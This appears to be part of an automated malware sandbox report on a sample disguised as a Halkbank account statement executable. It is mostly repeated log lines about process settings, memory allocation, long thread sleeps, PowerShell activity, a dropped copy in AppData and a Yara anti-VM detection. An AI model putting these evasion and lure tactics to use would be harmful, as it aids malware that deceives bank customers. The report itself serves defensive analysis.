Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bAZAANr.exe PID: 3668, type: MEMORYSTR

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 25F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 8ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 7730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 9ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: AED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 4980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 89E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 99E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 9BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: ABE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 27B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 2980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Memory allocated: 27B0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599888	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598358	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597763	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597490	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 597075	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 595108	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594998	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594772	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 594062	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Thread delayed: delay time: 593843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5988	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8046	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 410	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Window / User API: threadDelayed 2521	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Window / User API: threadDelayed 7311	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 1816	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292	Thread sleep count: 5988 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4752	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4760	Thread sleep count: 190 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7608	Thread sleep count: 2521 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599888s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7608	Thread sleep count: 7311 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe TID: 7604	Thread sleep time: -598687s >= -30000s	Jump to behavior
